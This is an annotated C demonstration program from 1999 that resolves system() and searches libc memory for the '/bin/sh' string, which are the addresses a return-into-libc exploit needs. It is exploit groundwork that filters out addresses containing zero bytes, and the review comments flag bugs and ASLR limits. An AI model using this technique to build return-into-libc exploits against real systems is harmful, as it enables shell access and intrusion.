/*
 * demonstration of program that finds where is "/bin/sh" string in its
 * mapping, using SD's linux exploits for `return into libc' method and
 * Solaris Designer's same exploits..
 *
 * kreator
 * Sun Nov 7 15:51:35 CET 1999
 *
 * How it works: dlsym() resolves the address of system() in this process,
 * then main() scans memory one byte at a time around that address for the
 * NUL-terminated string "/bin/sh".  A SIGSEGV handler plus setjmp()/longjmp()
 * turns "walked off the end of the mapping" into "flip direction".  Both
 * addresses are printed to stderr; nothing else is done with them.
 *
 * NOTE(review): the header names were lost when this page was extracted.
 * The calls below need <stdio.h> (fprintf), <stdlib.h> (exit, EXIT_*),
 * <setjmp.h> (jmp_buf, setjmp, longjmp), <signal.h> (signal, SIGSEGV) and
 * <dlfcn.h> (dlopen, dlsym, RTLD_LAZY); memcmp() would also want <string.h>.
 *
 * NOTE(review): the addresses printed here are only meaningful for another
 * process if libc is mapped at the same place there; with randomised library
 * placement (ASLR) that assumption does not hold, so the result is a
 * per-run, per-process value.
 */
#include
#include
#include
#include
#include

int step;       /* search direction: -1 = downwards, +1 = upwards (set in main) */
jmp_buf env;    /* stack environment: saved by setjmp() in main, restored by segfault() */

/*
 * SIGSEGV handler.  The scan in main() reads memory until it leaves the
 * mapping, so a fault is the expected way for one direction to end.  On the
 * first fault (still heading downwards) jump back to the setjmp() in main,
 * which flips the direction; a second fault means both directions have been
 * exhausted, so report failure and exit.
 *
 * NOTE(review): declared without the `int` signal-number parameter that the
 * signal() prototype expects, and longjmp() (rather than siglongjmp()) is
 * called from inside a signal handler -- this works on the platforms the
 * demo was written for but is not portable behaviour.
 */
void segfault()
{
    if (step<0)                     /* we were heading backwards */
        longjmp(env, 1);            /* restore stack environment */
    else {
        /* oops! we have already changed direction :-( */
        fprintf(stderr, "Cannot find \"/bin/sh\" in libc mapping.\n");
        exit(EXIT_FAILURE);
    }
}

/*
 * Entry point; argc/argv are unused.  Prints the address of system() and of
 * a "/bin/sh" string near it to stderr and returns EXIT_SUCCESS.  Exits with
 * EXIT_FAILURE if dlopen()/dlsym() fail, if the adjusted system() address
 * contains a zero byte, or if the scan faults in both directions.
 */
int main(int argc, char **argv)
{
    void *handle;
    long systemaddr, shell;         /* addresses kept as long so they can be masked and printed with %lx */
    int (*system)(const char *);    /* local named like libc's system(); filled from dlsym() below */

    /* dlopen() myself */
    if (!(handle=dlopen(NULL, RTLD_LAZY))) {
        fprintf(stderr, "Cannot dlopen() myself.\n");
        exit(EXIT_FAILURE);
    }

    /* find address of system() */
    /* The void * from dlsym() is stored both as a function pointer (for the
     * test call below) and as a long (for the arithmetic and masking);
     * pointer-to-integer conversion is implementation-defined. */
    if ((systemaddr=system=dlsym(handle, "system"))==NULL) {
        fprintf(stderr, "Cannot find system() using dlsym().\n");
        exit(EXIT_FAILURE);
    }

    systemaddr-=8;  /* This is changed to -8 because the ret would add 8 to the saved %fp */
                    /* NOTE(review): %fp is the frame-pointer register name on
                     * SPARC, so this adjustment presumably belongs to the
                     * Solaris variant mentioned in the header -- confirm
                     * before reading anything into the value on other targets. */

    /* Reject an address that has a zero byte in any of its four low bytes
     * (presumably because a NUL would cut short whatever copies the address
     * around).  Only the low 32 bits are masked, so on a platform with a
     * 64-bit long the upper bytes are never examined. */
    if (!(systemaddr & 0xff) || !(systemaddr & 0xff00) ||
        !(systemaddr & 0xff0000) || !(systemaddr & 0xff000000)) {
        fprintf(stderr, "Address of system() contains a '0'." "Sorry.\n");
        exit(EXIT_FAILURE);
    }

    /* test system() */
    /* Calls through the resolved pointer to confirm it really is system();
     * this runs a shell command in this process. */
    (*system)("echo yup, this works..");
    fprintf(stderr, "Function system() found at %lx\n", systemaddr);

    /* if longjmp() returns non-zero revert search direction */
    /* First pass: setjmp() returns 0 and the scan heads downwards.  When
     * segfault() longjmp()s back here it returns 1 and the scan restarts
     * from systemaddr heading upwards. */
    if (setjmp(env))
        step=1;
    else
        step=-1;

    /* we will search around system() */
    shell=systemaddr;

    /* remap segmentation fault signal */
    /* This line runs again after every longjmp() (setjmp() is above it), so
     * the handler is re-installed even where signal() resets the disposition
     * to default after delivery. */
    signal(SIGSEGV, segfault);

    /* search for "/bin/sh" until SEGV */
    /* Inner loop: move one byte per step until the 8 bytes at `shell` equal
     * "/bin/sh" followed by its NUL terminator (the length 8 includes the
     * NUL, so this is a whole-string match, not a prefix match).  Outer loop:
     * retry if the match's address has a zero byte in its low four bytes,
     * same rule as for system() above.  Nothing bounds the read -- leaving
     * the mapping raises SIGSEGV, which segfault() handles.
     *
     * NOTE(review): when the outer condition rejects a match, the inner
     * while() is re-entered at the same `shell`, where memcmp() still
     * matches, so it looks like the loop would spin rather than advance
     * past that match -- verify on the intended platform. */
    do
        while (memcmp((void *)shell, "/bin/sh", 8))
            shell+=step;
    while (!(shell & 0xff) || !(shell & 0xff00) ||
           !(shell & 0xff0000) || !(shell & 0xff000000));

    /* NOTE(review): `shell` is a long but is passed for %s, which expects a
     * char *; that is undefined behaviour in standard C and only works where
     * long and pointers are the same size and passed the same way. */
    fprintf(stderr, "String \"%s\" found at %lx\n", shell, shell);

    /* exploit follows :-) */
    return(EXIT_SUCCESS);
}